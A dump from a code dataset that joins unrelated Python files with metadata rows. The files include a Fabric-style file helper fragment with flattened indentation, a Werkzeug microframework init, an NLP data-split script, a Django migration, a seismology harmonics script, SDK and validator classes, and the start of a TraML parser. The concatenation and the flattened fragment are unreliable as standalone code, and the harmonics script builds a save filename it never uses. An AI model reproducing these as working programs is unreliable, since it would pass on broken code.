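    if not contains('/etc/hosts', '10.0.0.5 db.internal', exact=True):
        append('/etc/hosts', '10.0.0.5 db.internal', use_sudo=True)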
def _escape_for_regex(text):
"""Escape ``text`` to allow literal matching using egrep"""
regex = re.escape(text)
# Seems like double escaping is needed for \
regex = regex.replace('\\\\', '\\\\\\')
# Triple-escaping seems to be required for $ signs
regex = regex.replace(r'\$', r'\\\$')
# Whereas single quotes should not be escaped
regex = regex.replace(r"\'", "'")
return regex
def _expand_path(path):
return '"$(echo %s)"' % path
| 37.898795
| 87
| 0.638543
|
794e526cf6386534186390c02df7eff01e38325d
| 374
|
py
|
Python
|
axe/__init__.py
|
soasme/axe
|
652b8075a1fd2b3aa66392d464575ffed6a758ae
|
[
"MIT"
] | null | null | null |
axe/__init__.py
|
soasme/axe
|
652b8075a1fd2b3aa66392d464575ffed6a758ae
|
[
"MIT"
] | null | null | null |
axe/__init__.py
|
soasme/axe
|
652b8075a1fd2b3aa66392d464575ffed6a758ae
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Axe
~~~
A microframework based on Werkzeug.
:copyright: (c) 2014 by Ju Lin.
:license: MIT, see LICENSE for more details.
"""
__all__ = [
'abort',
'redirect',
'exceptions',
'Axe',
]
import werkzeug.exceptions as exceptions
from werkzeug.utils import redirect
from .app import Axe
from .utils import abort
| 14.96
| 48
| 0.625668
|
794e5424d1555685ab1a85aebfd73d84152e9a15
| 2,291
|
py
|
Python
|
ch06/50_fetch_shape_data.py
|
taro-masuda/nlp100
|
a2f73777b8215622726d040f48add9ab6b50c188
|
[
"MIT"
] | 3
|
2021-06-22T10:17:56.000Z
|
2022-02-21T07:11:57.000Z
|
ch06/50_fetch_shape_data.py
|
taro-masuda/nlp100
|
a2f73777b8215622726d040f48add9ab6b50c188
|
[
"MIT"
] | null | null | null |
ch06/50_fetch_shape_data.py
|
taro-masuda/nlp100
|
a2f73777b8215622726d040f48add9ab6b50c188
|
[
"MIT"
] | null | null | null |
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
import random
import os
import requests
import zipfile
import io
def seed_everything(seed=42):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
def fetch_data(url: str, save_dir: str, filename: str) -> pd.DataFrame:
req = requests.get(url)
zip_file = zipfile.ZipFile(io.BytesIO(req.content))
zip_file.extractall(save_dir)
df = pd.read_csv(os.path.join(save_dir, filename), sep='\t', header=None)
return df
def shape_data(df: pd.DataFrame):#-> (pd.DataFrame, pd.DataFrame, pd.DataFrame):
df.columns = ['id', 'title', 'url', 'publisher', 'category', 'story', 'hostname', 'timestamp']
df_cond = df[df['publisher'].isin(['Reuters' ,'Huffington Post',
'Businessweek', 'Contactmusic.com', 'Daily Mail'])]
df_train, df_val_test = train_test_split(df_cond, test_size=0.2)
df_val, df_test = train_test_split(df_val_test, test_size=0.5)
return df_train, df_val, df_test
def fetch_shape_data(url: str, save_dir: str, filename: str):# -> (pd.DataFrame, pd.DataFrame, pd.DataFrame):
df = fetch_data(url=url, save_dir=save_dir, filename=filename)
train_df, valid_df, test_df = shape_data(df=df)
return train_df, valid_df, test_df
if __name__ == '__main__':
seed_everything(seed=42)
url = 'https://archive.ics.uci.edu/ml/machine-learning-databases/00359/NewsAggregatorDataset.zip'
save_dir = './data/'
filename = 'newsCorpora.csv'
df_train, df_val, df_test = fetch_shape_data(url=url,
save_dir=save_dir,
filename=filename)
df_train.to_csv(os.path.join(save_dir, 'train.txt'), sep='\t',
index=None)
df_val.to_csv(os.path.join(save_dir, 'val.txt'), sep='\t',
index=None)
df_test.to_csv(os.path.join(save_dir, 'test.txt'), sep='\t',
index=None)
print('df_train record size:', len(df_train))
print('df_val record size:', len(df_val))
print('df_test record size:', len(df_test))
'''
df_train record size: 10672
df_val record size: 1334
df_test record size: 1334
'''
| 40.192982
| 109
| 0.64557
|
794e54795c37bb4144ce782213781ce1e2a3330b
| 479
|
py
|
Python
|
home/migrations/0011_auto_20190604_1215.py
|
xni06/wagtail-CMS
|
defe0f46e8109e96d6d5e9fd4cf002790fbcd54b
|
[
"MIT"
] | 4
|
2019-06-04T07:18:44.000Z
|
2020-06-15T22:27:36.000Z
|
home/migrations/0011_auto_20190604_1215.py
|
jaspotsangbam/wagtail-CMS
|
2ec0dd05ba1f9339b705ce529588131049aa9bc7
|
[
"MIT"
] | 38
|
2019-05-09T13:14:56.000Z
|
2022-03-12T00:54:57.000Z
|
home/migrations/0011_auto_20190604_1215.py
|
jaspotsangbam/wagtail-CMS
|
2ec0dd05ba1f9339b705ce529588131049aa9bc7
|
[
"MIT"
] | 3
|
2019-09-26T14:32:36.000Z
|
2021-05-06T15:48:01.000Z
|
# Generated by Django 2.1.8 on 2019-06-04 12:15
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.fields
class Migration(migrations.Migration):
dependencies = [
('home', '0010_auto_20190604_1147'),
]
operations = [
migrations.AlterField(
model_name='homepage',
name='links',
field=wagtail.core.fields.StreamField([('link', wagtail.core.blocks.RichTextBlock())]),
),
]
| 22.809524
| 99
| 0.634656
|
794e5586e708657cbac48ada1eb6474769c452af
| 18,403
|
py
|
Python
|
Scripts/rfpy_harmonics.py
|
ttkyryliuk/RfPy
|
727521f094fcb685622d31ae3f353c0d21713d0e
|
[
"MIT"
] | null | null | null |
Scripts/rfpy_harmonics.py
|
ttkyryliuk/RfPy
|
727521f094fcb685622d31ae3f353c0d21713d0e
|
[
"MIT"
] | null | null | null |
Scripts/rfpy_harmonics.py
|
ttkyryliuk/RfPy
|
727521f094fcb685622d31ae3f353c0d21713d0e
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2019 Pascal Audet
#
# This file is part of RfPy.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Import modules and functions
import numpy as np
import pickle
import stdb
from obspy.clients.fdsn import Client
from obspy.core import Stream, UTCDateTime
from rfpy import binning, plotting, Harmonics
from pathlib import Path
from argparse import ArgumentParser
from os.path import exists as exist
from numpy import nan
def get_harmonics_arguments(argv=None):
"""
Get Options from :class:`~optparse.OptionParser` objects.
This function is used for data processing on-the-fly (requires web connection)
"""
parser = ArgumentParser(
usage="%(prog)s [arguments] <station database>",
description="Script used to process receiver function data " +
"for harmonic decomposition.")
# General Settings
parser.add_argument(
"indb",
help="Station Database to process from.",
type=str)
parser.add_argument(
"--keys",
action="store",
type=str,
dest="stkeys",
default="",
help="Specify a comma separated list of station keys for " +
"which to perform the analysis. These must be " +
"contained within the station database. Partial keys will " +
"be used to match against those in the dictionary. For " +
"instance, providing IU will match with all stations in " +
"the IU network [Default processes all stations in the database]")
parser.add_argument(
"-v", "-V", "--verbose",
action="store_true",
dest="verb",
default=False,
help="Specify to increase verbosity.")
parser.add_argument(
"-O", "--overwrite",
action="store_true",
dest="ovr",
default=False,
help="Force the overwriting of pre-existing data. " +
"[Default False]")
parser.add_argument(
"-L", "--long-name",
action="store_true",
dest="lkey",
default=False,
help="Force folder names to use long-key form (NET.STN.CHN). " +
"Default behaviour uses short key form (NET.STN) for the folder " +
"names, regardless of the key type of the database."
)
# Event Selection Criteria
TimeGroup = parser.add_argument_group(
title="Time Settings",
description="Settings associated with refining " +
"the times to include in searching for receiver function data")
TimeGroup.add_argument(
"--start",
action="store",
type=str,
dest="startT",
default="",
help="Specify a UTCDateTime compatible string representing " +
"the start time for the search. This will override any " +
"station start times. [Default start date of station]")
TimeGroup.add_argument(
"--end",
action="store",
type=str,
dest="endT",
default="",
help="Specify a UTCDateTime compatible string representing " +
"the end time for the search. This will override any " +
"station end times [Default end date of station]")
PreGroup = parser.add_argument_group(
title='Pre-processing Settings',
description="Options for pre-processing of receiver function " +
"data prior to harmonic decomposition")
PreGroup.add_argument(
"--bp",
action="store",
type=str,
dest="bp",
default=None,
help="Specify the corner frequencies for the bandpass filter. " +
"[Default 0.05,0.5]")
PreGroup.add_argument(
"--bin",
action="store",
dest="nbin",
type=int,
default=None,
help="Specify integer number of back-azimuth bins to consider " +
"(typically 36 or 72). [Default does not bin data]")
PreGroup.add_argument(
"--snr",
action="store",
type=float,
dest="snr",
default=-9999.,
help="Specify the SNR threshold for extracting receiver functions. " +
"[Default None]")
PreGroup.add_argument(
"--snrh",
action="store",
type=float,
dest="snrh",
default=-9999,
help="Specify the horizontal component SNR threshold for " +
"extracting receiver functions. [Default None]")
PreGroup.add_argument(
"--cc",
action="store",
type=float,
dest="cc",
default=-1.,
help="Specify the CC threshold for extracting receiver functions. " +
"[Default None]")
PreGroup.add_argument(
"--no-outlier",
action="store_true",
dest="no_outl",
default=False,
help="Set this option to delete outliers based on the MAD " +
"on the variance. [Default False]")
PreGroup.add_argument(
"--phase",
action="store",
type=str,
dest="phase",
default='allP',
help="Specify the phase name to plot. " +
"Options are 'P', 'PP', 'allP', 'S', 'SKS' or 'allS'. " +
"[Default 'allP']")
HarmonicGroup = parser.add_argument_group(
title='Settings for harmonic decomposition',
description="Specify parameters for the decomposition, e.g. " +
"a fixed azimuth, depth range for finding the optimal azimuth, etc.")
HarmonicGroup.add_argument(
"--azim",
action="store",
type=float,
dest="azim",
default=None,
        help="Specify the azimuth angle along which to perform the " +
"decomposition. [Default 0.]")
HarmonicGroup.add_argument(
"--find-azim",
action="store_true",
dest="find_azim",
default=False,
help="Set this option to calculate the optimal azimuth. [Default " +
"uses the '--azim' value]")
HarmonicGroup.add_argument(
"--trange",
action="store",
type=str,
dest="trange",
default=None,
        help="Specify a list of two floats with minimum and maximum " +
"bounds on time range for finding the optimal azimuth (sec). " +
"[Default [0., 10.] when '--find-azim' is set]")
HarmonicGroup.add_argument(
"--save",
action="store_true",
dest="save",
default=False,
help="Set this option to save the Harmonics object " +
"to a pickled file. [Default does not save object]")
PlotGroup = parser.add_argument_group(
title='Settings for plotting results',
description="Specify parameters for plotting the back-azimuth " +
"harmonics.")
PlotGroup.add_argument(
"--plot",
action="store_true",
dest="plot",
default=False,
help="Set this option to produce a plot of the back-azimuth harmonics")
PlotGroup.add_argument(
"--ymax",
action="store",
type=float,
dest="ymax",
default=30.,
        help="Specify the maximum y axis value for the plot in units of the " +
"dependent variable (e.g., sec). [Default 30.]")
PlotGroup.add_argument(
"--scale",
action="store",
type=float,
dest="scale",
default=30.,
        help="Specify the scaling value that multiplies the amplitude " +
        "of the harmonic components. [Default 30.]")
PlotGroup.add_argument(
"--save-plot",
action="store_true",
dest="save_plot",
default=False,
help="Set this option to save the plot [Default doesn't save]")
PlotGroup.add_argument(
"--title",
action="store",
type=str,
dest="title",
default="",
help="Specify plot title [Default has no title]")
PlotGroup.add_argument(
"--format",
action="store",
type=str,
dest="form",
default="png",
        help="Specify format of figure. Can be any one of the valid " +
"matplotlib formats: 'png', 'jpg', 'eps', 'pdf'. [Default 'png']")
args = parser.parse_args(argv)
# Check inputs
if not exist(args.indb):
parser.error("Input file " + args.indb + " does not exist")
# create station key list
if len(args.stkeys) > 0:
args.stkeys = args.stkeys.split(',')
# construct start time
if len(args.startT) > 0:
try:
args.startT = UTCDateTime(args.startT)
except:
parser.error(
"Cannot construct UTCDateTime from start time: " +
args.startT)
else:
args.startT = None
# construct end time
if len(args.endT) > 0:
try:
args.endT = UTCDateTime(args.endT)
except:
parser.error(
"Cannot construct UTCDateTime from end time: " +
args.endT)
else:
args.endT = None
if args.phase not in ['P', 'PP', 'allP', 'S', 'SKS', 'allS']:
parser.error(
"Error: choose between 'P', 'PP', 'allP', 'S', 'SKS' and 'allS'.")
if args.phase == 'allP':
args.listphase = ['P', 'PP']
elif args.phase == 'allS':
args.listphase = ['S', 'SKS']
else:
args.listphase = [args.phase]
if args.bp is None:
args.bp = [0.05, 0.5]
else:
args.bp = [float(val) for val in args.bp.split(',')]
args.bp = sorted(args.bp)
if (len(args.bp)) != 2:
parser.error(
"Error: --bp should contain 2 " +
"comma-separated floats")
if args.azim is not None and args.find_azim:
print("Warning: Setting both '--azim' and '--find-azim' is " +
"conflictual. Ignoring '--find-azim'")
args.find_azim = False
elif args.azim is None and not args.find_azim:
args.azim = 0.
if args.find_azim:
if args.trange is None:
args.trange = [0., 10.]
else:
args.trange = [float(val) for val in args.trange.split(',')]
args.trange = sorted(args.trange)
if (len(args.trange)) != 2:
parser.error(
"Error: --trange should contain 2 " +
"comma-separated floats")
return args
def main():
print()
print("################################################################################")
print("# __ _ _ #")
print("# _ __ / _|_ __ _ _ | |__ __ _ _ __ _ __ ___ ___ _ __ (_) ___ ___ #")
print("# | '__| |_| '_ \| | | | | '_ \ / _` | '__| '_ ` _ \ / _ \| '_ \| |/ __/ __| #")
print(
"# | | | _| |_) | |_| | | | | | (_| | | | | | | | | (_) | | | | | (__\__ \ #")
print("# |_| |_| | .__/ \__, |___|_| |_|\__,_|_| |_| |_| |_|\___/|_| |_|_|\___|___/ #")
print("# |_| |___/_____| #")
print("# #")
print("################################################################################")
print()
# Run Input Parser
args = get_harmonics_arguments()
# Load Database
db, stkeys = stdb.io.load_db(fname=args.indb, keys=args.stkeys)
# Track processed folders
procfold = []
# Loop over station keys
for stkey in list(stkeys):
# Extract station information from dictionary
sta = db[stkey]
# Construct Folder Name
stfld = stkey
if not args.lkey:
stfld = stkey.split('.')[0]+"."+stkey.split('.')[1]
# Define path to see if it exists
if args.phase in ['P', 'PP', 'allP']:
datapath = Path('P_DATA') / stfld
elif args.phase in ['S', 'SKS', 'allS']:
datapath = Path('S_DATA') / stfld
if not datapath.is_dir():
print('Path to ' + str(datapath) +
' doesn`t exist - continuing')
continue
# Get search start time
if args.startT is None:
tstart = sta.startdate
else:
tstart = args.startT
# Get search end time
if args.endT is None:
tend = sta.enddate
else:
tend = args.endT
if tstart > sta.enddate or tend < sta.startdate:
continue
# Temporary print locations
tlocs = sta.location
if len(tlocs) == 0:
tlocs = ['']
for il in range(0, len(tlocs)):
if len(tlocs[il]) == 0:
tlocs[il] = "--"
sta.location = tlocs
# Update Display
print(" ")
print(" ")
print("|===============================================|")
print("|===============================================|")
print("| {0:>8s} |".format(
sta.station))
print("|===============================================|")
print("|===============================================|")
print("| Station: {0:>2s}.{1:5s} |".format(
sta.network, sta.station))
print("| Channel: {0:2s}; Locations: {1:15s} |".format(
sta.channel, ",".join(tlocs)))
print("| Lon: {0:7.2f}; Lat: {1:6.2f} |".format(
sta.longitude, sta.latitude))
print("| Start time: {0:19s} |".format(
sta.startdate.strftime("%Y-%m-%d %H:%M:%S")))
print("| End time: {0:19s} |".format(
sta.enddate.strftime("%Y-%m-%d %H:%M:%S")))
print("|-----------------------------------------------|")
# Check for folder already processed
if stfld in procfold:
print(' {0} already processed...skipping '.format(stfld))
continue
rfRstream = Stream()
rfTstream = Stream()
datafiles = [x for x in datapath.iterdir() if x.is_dir()]
for folder in datafiles:
# Skip hidden folders
if folder.name.startswith('.'):
continue
date = folder.name.split('_')[0]
year = date[0:4]
month = date[4:6]
day = date[6:8]
dateUTC = UTCDateTime(year+'-'+month+'-'+day)
if dateUTC > tstart and dateUTC < tend:
filename = folder / "RF_Data.pkl"
if filename.is_file():
file = open(filename, "rb")
rfdata = pickle.load(file)
if rfdata[0].stats.snrh > args.snrh and \
                            rfdata[0].stats.snr > args.snr and \
rfdata[0].stats.cc > args.cc:
rfRstream.append(rfdata[1])
rfTstream.append(rfdata[2])
file.close()
else:
continue
if args.no_outl:
# Remove outliers wrt variance
varR = np.array([np.var(tr.data) for tr in rfRstream])
# Calculate outliers
medvarR = np.median(varR)
madvarR = 1.4826*np.median(np.abs(varR-medvarR))
robustR = np.abs((varR-medvarR)/madvarR)
outliersR = np.arange(len(rfRstream))[robustR > 2.]
for i in outliersR[::-1]:
rfRstream.remove(rfRstream[i])
rfTstream.remove(rfTstream[i])
# Do the same for transverse
varT = np.array([np.var(tr.data) for tr in rfTstream])
medvarT = np.median(varT)
madvarT = 1.4826*np.median(np.abs(varT-medvarT))
robustT = np.abs((varT-medvarT)/madvarT)
outliersT = np.arange(len(rfTstream))[robustT > 2.]
for i in outliersT[::-1]:
rfRstream.remove(rfRstream[i])
rfTstream.remove(rfTstream[i])
# Try binning if specified
if args.nbin is not None:
rf_tmp = binning.bin(rfRstream, rfTstream,
typ='baz', nbin=args.nbin+1)
rfRstream = rf_tmp[0]
rfTstream = rf_tmp[1]
# Filter original streams
rfRstream.filter('bandpass', freqmin=args.bp[0],
freqmax=args.bp[1], corners=2,
zerophase=True)
rfTstream.filter('bandpass', freqmin=args.bp[0],
freqmax=args.bp[1], corners=2,
zerophase=True)
# Initialize the HkStack object
harmonics = Harmonics(rfRstream, rfTstream)
# Stack with or without dip
if args.find_azim:
harmonics.dcomp_find_azim(xmin=args.trange[0], xmax=args.trange[1])
print("Optimal azimuth for trange between " +
str(args.trange[0])+" and "+str(args.trange[1]) +
" seconds is: "+str(harmonics.azim))
else:
harmonics.dcomp_fix_azim(azim=args.azim)
if args.plot:
harmonics.plot(args.ymax, args.scale,
args.save_plot, args.title, args.form)
if args.save:
            filename = datapath / (rfRstream[0].stats.station +
                                   ".harmonics.pkl")
harmonics.save()
# Update processed folders
procfold.append(stfld)
if __name__ == "__main__":
# Run main program
main()
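# A minimal invocation sketch, not part of the original script; the station
# database file and station key below are hypothetical examples. The equivalent
# command line would be:
#   rfpy_harmonics.py --keys TA.EPYK --find-azim --trange 0.,10. --plot stations.pkl
def _example_arguments():  # illustrative only, never called by the script
    return get_harmonics_arguments(
        ["stations.pkl", "--keys", "TA.EPYK",
         "--find-azim", "--trange", "0.,10.", "--plot"])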
| 34.78828
| 93
| 0.532087
|
794e55de4deb3edb68474389856a9397451eca32
| 546
|
py
|
Python
|
plotly/validators/scatterpolar/marker/colorbar/_showtickprefix.py
|
faezs/plotly.py
|
6009b5b9c746e5d2a2849ad255a4eb234b551ed7
|
[
"MIT"
] | 2
|
2020-03-24T11:41:14.000Z
|
2021-01-14T07:59:43.000Z
|
plotly/validators/scatterpolar/marker/colorbar/_showtickprefix.py
|
faezs/plotly.py
|
6009b5b9c746e5d2a2849ad255a4eb234b551ed7
|
[
"MIT"
] | null | null | null |
plotly/validators/scatterpolar/marker/colorbar/_showtickprefix.py
|
faezs/plotly.py
|
6009b5b9c746e5d2a2849ad255a4eb234b551ed7
|
[
"MIT"
] | 4
|
2019-06-03T14:49:12.000Z
|
2022-01-06T01:05:12.000Z
|
import _plotly_utils.basevalidators
class ShowtickprefixValidator(
_plotly_utils.basevalidators.EnumeratedValidator
):
def __init__(
self,
plotly_name='showtickprefix',
parent_name='scatterpolar.marker.colorbar',
**kwargs
):
super(ShowtickprefixValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='colorbars',
role='style',
values=['all', 'first', 'last', 'none'],
**kwargs
)
| 24.818182
| 54
| 0.602564
|
794e5626a66cf60721284635c4b42aad8e7c657b
| 3,391
|
py
|
Python
|
mkt/abuse/models.py
|
muffinresearch/zamboni
|
045a6f07c775b99672af6d9857d295ed02fe5dd9
|
[
"BSD-3-Clause"
] | null | null | null |
mkt/abuse/models.py
|
muffinresearch/zamboni
|
045a6f07c775b99672af6d9857d295ed02fe5dd9
|
[
"BSD-3-Clause"
] | null | null | null |
mkt/abuse/models.py
|
muffinresearch/zamboni
|
045a6f07c775b99672af6d9857d295ed02fe5dd9
|
[
"BSD-3-Clause"
] | null | null | null |
import logging
from django.conf import settings
from django.db import models
from django.utils.translation import gettext
import amo.models
import amo.utils
from mkt.webapps.models import Addon
from mkt.users.models import UserProfile
log = logging.getLogger('z.abuse')
class AbuseReport(amo.models.ModelBase):
# NULL if the reporter is anonymous.
reporter = models.ForeignKey(UserProfile, null=True,
blank=True, related_name='abuse_reported')
ip_address = models.CharField(max_length=255, default='0.0.0.0')
# An abuse report can be for an addon or a user. Only one of these should
# be null.
addon = models.ForeignKey(Addon, null=True, related_name='abuse_reports')
user = models.ForeignKey(UserProfile, null=True,
related_name='abuse_reports')
message = models.TextField()
class Meta:
db_table = 'abuse_reports'
def send(self):
obj = self.addon or self.user
if self.reporter:
user_name = '%s (%s)' % (self.reporter.name, self.reporter.email)
else:
user_name = 'An anonymous coward'
with amo.utils.no_translation():
type_ = (gettext(amo.ADDON_TYPE[self.addon.type])
if self.addon else 'User')
subject = u'[%s] Abuse Report for %s' % (type_, obj.name)
msg = u'%s reported abuse for %s (%s%s).\n\n%s' % (
user_name, obj.name, settings.SITE_URL, obj.get_url_path(),
self.message)
amo.utils.send_mail(subject, msg,
recipient_list=(settings.ABUSE_EMAIL,))
@classmethod
def recent_high_abuse_reports(cls, threshold, period, addon_id=None,
addon_type=None):
"""
        Returns AbuseReport objects for add-ons whose report count exceeds the
        given threshold since the given `period` cutoff (a datetime). Filters
        by addon_id or addon_type if provided.
        E.g. more than 5 abuse reports for all webapps in the past 7 days.
"""
abuse_sql = ['''
SELECT `abuse_reports`.*,
COUNT(`abuse_reports`.`addon_id`) AS `num_reports`
FROM `abuse_reports`
INNER JOIN `addons` ON (`abuse_reports`.`addon_id` = `addons`.`id`)
WHERE `abuse_reports`.`created` >= %s ''']
params = [period]
if addon_id:
abuse_sql.append('AND `addons`.`id` = %s ')
params.append(addon_id)
elif addon_type and addon_type in amo.ADDON_TYPES:
abuse_sql.append('AND `addons`.`addontype_id` = %s ')
params.append(addon_type)
abuse_sql.append('GROUP BY addon_id HAVING num_reports > %s')
params.append(threshold)
return list(cls.objects.raw(''.join(abuse_sql), params))
def send_abuse_report(request, obj, message):
report = AbuseReport(ip_address=request.META.get('REMOTE_ADDR'),
message=message)
if request.user.is_authenticated():
report.reporter = request.user
if isinstance(obj, Addon):
report.addon = obj
elif isinstance(obj, UserProfile):
report.user = obj
report.save()
report.send()
# Trigger addon high abuse report detection task.
if isinstance(obj, Addon):
from amo.tasks import find_abuse_escalations
find_abuse_escalations.delay(obj.id)
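# Hedged usage sketch (not part of the original module). It assumes a
# configured Django/zamboni environment; note that `period` is passed as a
# datetime cutoff, matching the raw SQL in recent_high_abuse_reports().
#
#   from datetime import datetime, timedelta
#
#   week_ago = datetime.now() - timedelta(days=7)
#   flagged = AbuseReport.recent_high_abuse_reports(threshold=5, period=week_ago)
#   for report in flagged:
#       print(report.addon_id, report.num_reports)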
| 36.074468
| 79
| 0.620466
|
794e562de3bc5dd0df1d69d4371d7ab13aa69398
| 2,140
|
py
|
Python
|
aliyun-python-sdk-rds/aliyunsdkrds/request/v20140815/DescribeDampPoliciesByCidRequest.py
|
sdk-team/aliyun-openapi-python-sdk
|
384730d707e6720d1676ccb8f552e6a7b330ec86
|
[
"Apache-2.0"
] | null | null | null |
aliyun-python-sdk-rds/aliyunsdkrds/request/v20140815/DescribeDampPoliciesByCidRequest.py
|
sdk-team/aliyun-openapi-python-sdk
|
384730d707e6720d1676ccb8f552e6a7b330ec86
|
[
"Apache-2.0"
] | null | null | null |
aliyun-python-sdk-rds/aliyunsdkrds/request/v20140815/DescribeDampPoliciesByCidRequest.py
|
sdk-team/aliyun-openapi-python-sdk
|
384730d707e6720d1676ccb8f552e6a7b330ec86
|
[
"Apache-2.0"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
class DescribeDampPoliciesByCidRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Rds', '2014-08-15', 'DescribeDampPoliciesByCid','rds')
def get_ResourceOwnerId(self):
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self,ResourceOwnerId):
self.add_query_param('ResourceOwnerId',ResourceOwnerId)
def get_SecurityToken(self):
return self.get_query_params().get('SecurityToken')
def set_SecurityToken(self,SecurityToken):
self.add_query_param('SecurityToken',SecurityToken)
def get_DBInstanceId(self):
return self.get_query_params().get('DBInstanceId')
def set_DBInstanceId(self,DBInstanceId):
self.add_query_param('DBInstanceId',DBInstanceId)
def get_ResourceOwnerAccount(self):
return self.get_query_params().get('ResourceOwnerAccount')
def set_ResourceOwnerAccount(self,ResourceOwnerAccount):
self.add_query_param('ResourceOwnerAccount',ResourceOwnerAccount)
def get_OwnerAccount(self):
return self.get_query_params().get('OwnerAccount')
def set_OwnerAccount(self,OwnerAccount):
self.add_query_param('OwnerAccount',OwnerAccount)
def get_OwnerId(self):
return self.get_query_params().get('OwnerId')
def set_OwnerId(self,OwnerId):
self.add_query_param('OwnerId',OwnerId)
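# Hedged usage sketch (not part of the generated SDK file). The credentials,
# region id and DB instance id below are placeholders.
#
#   from aliyunsdkcore.client import AcsClient
#
#   client = AcsClient('<access-key-id>', '<access-key-secret>', 'cn-hangzhou')
#   request = DescribeDampPoliciesByCidRequest()
#   request.set_DBInstanceId('<db-instance-id>')
#   response = client.do_action_with_exception(request)
#   print(response)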
| 35.666667
| 84
| 0.77757
|
794e57af1f8bc8bdd40e8594eee12551f7bd4607
| 8,846
|
py
|
Python
|
pyteomics/traml.py
|
superrino130/pyteomics
|
2d901a9f351d979628c2e3781440c4db77aac12c
|
[
"Apache-2.0"
] | 47
|
2020-02-29T21:47:01.000Z
|
2022-03-17T13:27:30.000Z
|
pyteomics/traml.py
|
superrino130/pyteomics
|
2d901a9f351d979628c2e3781440c4db77aac12c
|
[
"Apache-2.0"
] | 53
|
2020-04-07T01:40:31.000Z
|
2022-03-17T12:15:44.000Z
|
pyteomics/traml.py
|
superrino130/pyteomics
|
2d901a9f351d979628c2e3781440c4db77aac12c
|
[
"Apache-2.0"
] | 23
|
2020-02-29T21:47:13.000Z
|
2021-11-26T04:32:07.000Z
|
"""
traml - targeted MS transition data in TraML format
===================================================
Summary
-------
TraML is a standard rich XML-format for targeted mass spectrometry method definitions.
Please refer to `psidev.info <http://www.psidev.info/traml>`_
for the detailed specification of the format and structure of TraML files.
This module provides a minimalistic way to extract information from TraML
files. You can use the object-oriented interface (:class:`TraML` instances) to
access target definitions and transitions. :class:`TraML` objects also support
indexing with entity IDs directly.
Data access
-----------
:py:class:`TraML` - a class representing a single TraML file.
Other data access functions use this class internally.
:py:func:`read` - iterate through transitions in TraML format.
:py:func:`chain` - read multiple TraML files at once.
:py:func:`chain.from_iterable` - read multiple files at once, using an
iterable of files.
Controlled Vocabularies
~~~~~~~~~~~~~~~~~~~~~~~
TraML relies on controlled vocabularies to describe its contents extensibly. See
`Controlled Vocabulary Terms <../data.html#controlled-vocabulary-terms-in-structured-data>`_
for more details on how they are used.
Handling Time Units and Other Qualified Quantities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
TraML contains information which may be described as using a variety of different time units.
See `Unit Handling <../data.html#unit-handling>`_ for more information.
Deprecated functions
--------------------
:py:func:`version_info` - get version information about the TraML file.
You can just read the corresponding attribute of the :py:class:`TraML` object.
  :py:func:`iterfind` - iterate over elements in a TraML file.
You can just call the corresponding method of the :py:class:`TraML` object.
Dependencies
------------
This module requires :py:mod:`lxml`
-------------------------------------------------------------------------------
"""
# Copyright 2018 Joshua Klein, Lev Levitsky
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import warnings
from . import xml, _schema_defaults, auxiliary as aux
class TraML(xml.MultiProcessingXML, xml.IndexSavingXML):
"""Parser class for TraML files."""
file_format = 'TraML'
_root_element = 'TraML'
_default_schema = _schema_defaults._traml_schema_defaults
_default_version = '1.0.0'
_default_iter_tag = 'Transition'
_indexed_tags = {
'Transition',
'Peptide',
'Compound',
'Target',
'Protein',
'Compound',
}
_element_handlers = xml.XML._element_handlers.copy()
_element_handlers.update({
'Modification': xml.XML._promote_empty_parameter_to_name,
'Interpretation': xml.XML._promote_empty_parameter_to_name,
'Software': xml.XML._promote_empty_parameter_to_name,
})
def __init__(self, *args, **kwargs):
kwargs.setdefault('retrieve_refs', True)
super(TraML, self).__init__(*args, **kwargs)
def _get_info_smart(self, element, **kw):
kwargs = dict(kw)
rec = kwargs.pop('recursive', None)
info = self._get_info(
element,
recursive=(rec if rec is not None else True),
**kwargs)
return info
def _retrieve_refs(self, info, **kwargs):
"""Retrieves and embeds the data for each attribute in `info` that
ends in `Ref`. Removes the id attribute from `info`"""
